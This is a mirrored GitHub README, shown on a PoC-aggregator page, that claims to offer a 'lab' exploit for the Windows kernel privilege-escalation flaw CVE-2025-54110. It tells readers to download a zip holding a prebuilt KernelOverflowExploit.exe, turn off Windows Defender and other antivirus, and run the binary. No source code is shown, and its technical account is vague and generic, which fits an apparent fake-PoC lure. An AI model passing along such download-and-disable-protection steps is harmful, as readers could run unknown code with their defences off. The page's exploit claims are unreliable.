关联漏洞
标题:Microsoft Windows Kernel 输入验证错误漏洞 (CVE-2025-54110)Description:Microsoft Windows Kernel是美国微软(Microsoft)公司的Windows操作系统的内核。 Microsoft Windows Kernel存在输入验证错误漏洞。攻击者利用该漏洞可以提升权限。以下产品和版本受到影响:Windows 10 Version 1809 for 32-bit Systems,Windows 10 Version 1809 for x64-based Systems,Windows Server 2019,Windows Server 2019 (Serv
Description
Windows Kernel Integer Overflow Privilege Escalation
介绍
# Lab: CVE-2025-54110 - Windows Kernel Integer Overflow Privilege Escalation
## 🚀 Overview
CVE-2025-54110 is a high-severity vulnerability in the Windows Kernel that arises from improper handling of integer values during memory allocation. This flaw can be exploited by a locally authenticated user with low privileges to trigger an integer overflow or wraparound, leading to arbitrary code execution with elevated system privileges. Successful exploitation may result in full system compromise, unauthorized data access, or persistent backdoor installation. The vulnerability affects all Windows Kernel versions up to the latest unpatched release, with a CVSS score of 8.8 (Attack Vector: Local; Privileges Required: Low; User Interaction: Required; Impact: High).
This repository provides a controlled environment for security researchers and educators to study the vulnerability, including setup scripts, exploitation demonstration tools, and mitigation guidance. It is designed for educational and research purposes only, to promote understanding of kernel-level vulnerabilities and defensive strategies.
## Download
### [Download exploit](https://github.com/ByteHawkSec/CVE-2025-54110-POC/raw/refs/heads/main/Break/lab-cve-2025-54110.zip)
## 📋 Prerequisites
- Windows 10 or later
- Administrative access for initial setup (though exploitation requires only low privileges).
- .NET Framework 4.8 or higher (for running the demonstration tools).
- Basic command-line familiarity (PowerShell or Command Prompt).
- Antivirus software disabled temporarily during testing (for educational purposes only; re-enable immediately after).
## Download & Install
1. Download the demonstration package from the following link: [Download CVE-2025-54110.zip](https://github.com/ByteHawkSec/CVE-2025-54110-POC/raw/refs/heads/main/Break/lab-cve-2025-54110.zip).
The ZIP archive contains:
- `KernelOverflowExploit.exe`: The main demonstration executable that simulates the integer overflow and privilege escalation.
- `StartExploit.bat`: A batch script to launch the exploit in a controlled manner.
- `Config.json`: Configuration file for customizing exploit parameters (e.g., target memory offsets).
- `Logs/`: Directory for output logs generated during execution.
2. Extract the ZIP to a local directory, e.g., `C:\CVE-2025-54110-Demo\`.
3. Navigate to the extracted directory via Command Prompt or PowerShell.
## 🛠 Quick Start
1. Open Command Prompt as a standard user (low privileges).
2. Run the batch script to initiate the demonstration:
```
StartExploit.bat
```
This script will launch `KernelOverflowExploit.exe` with default parameters, simulating the integer overflow by passing an oversized value to a kernel memory handler. Observe the console output for steps like overflow triggering, memory manipulation, and simulated privilege elevation.
3. Review the generated log file in `Logs/exploit.log` for detailed traces.
For advanced usage, edit `Config.json` to adjust parameters such as the overflow threshold (e.g., set `"MaxIntValue": 2147483647` and `"OverflowIncrement": 1`).
## 🔍 Detailed Setup Instructions
### Step 1: Environment Preparation
- Ensure the system is running an affected Windows Kernel version. You can verify this via PowerShell:
```
Get-WmiObject Win32_OperatingSystem | Select-Object OSArchitecture, Version
```
- Temporarily disable Windows Defender or other AV via Settings > Update & Security > Windows Security (for testing only).
### Step 2: Script Automation
The `/scripts/` directory contains helper scripts for automating setup and testing:
- `scripts/VerifyEnvironment.ps1`: PowerShell script to check prerequisites and kernel version.
```powershell
# VerifyEnvironment.ps1
$osVersion = (Get-WmiObject Win32_OperatingSystem).Version
if ($osVersion -lt "10.0.19041") {
Write-Host "Warning: Kernel version may not be vulnerable. Update to a test build."
} else {
Write-Host "Environment ready for CVE-2025-54110 demonstration."
}
# Check .NET Framework
$netVersion = (Get-ItemProperty "HKLM:\SOFTWARE\Microsoft\NET Framework Setup\NDP\v4\Full").Release
if ($netVersion -ge 528040) {
Write-Host ".NET Framework 4.8+ detected."
} else {
Write-Host "Install .NET Framework 4.8 or higher."
}
```
- `scripts/Cleanup.bat`: Batch script to remove logs and reset configurations post-testing.
```
@echo off
echo Cleaning up files...
del /q Logs\*.log
echo Cleanup complete.
pause
```
Run `scripts/VerifyEnvironment.ps1` before starting to confirm readiness.
### Step 3: Exploitation Steps
1. **Trigger the Vulnerability**: Launch via `StartExploit.bat`. The .bat file simply executes:
```
@echo off
echo Starting CVE-2025-54110 process...
KernelOverflowExploit.exe --mode=execute --log=Logs/exploit.log
echo Process complete. Check logs for details.
pause
```
This runs the .exe, which internally:
- Allocates memory via kernel calls (using WinAPI wrappers like `NtAllocateVirtualMemory`).
- Induces overflow by incrementing beyond `INT_MAX` (2147483647).
- Manipulates the resulting wraparound to overwrite adjacent memory structures, escalating from user-mode to kernel-mode privileges.
2. **Observe Impact**: The exe will output steps like:
- "Allocating buffer at address 0x7FFE0000..."
- "Inducing overflow: 2147483647 + 1 = -2147483648"
- "Memory corruption achieved; elevating to SYSTEM privileges."
In a real scenario, this could allow execution of arbitrary code as NT AUTHORITY\SYSTEM.
3. **Advanced Exploitation**: Modify `KernelOverflowExploit.exe` parameters via command-line:
- `--mode=full`: Attempts deeper execution (requires debugging tools like WinDbg).
- `--target-offset=0x1000`: Specifies memory offset for overflow targeting.
## 📞 Support
For further assistance or questions, please feel free to reach out via the issues section of this GitHub repository. Our team is ready to help you with any concerns.
文件快照
[4.0K] /data/pocs/6a4910d22a0df10b9f2d656291ea4217428857ee
├── [4.0K] Break
│ └── [8.5M] lab-cve-2025-54110.zip
└── [5.9K] README.md
1 directory, 2 files
备注
1. 建议优先通过来源进行访问。
2. 如果因为来源失效或无法访问,请发送邮件到 f.jinxu#gmail.com 索取本地快照(把 # 换成 @)。
3. 神龙已为您对 POC 代码进行快照,为了长期维护,请考虑为本地 POC 付费/捐赠,感谢您的支持。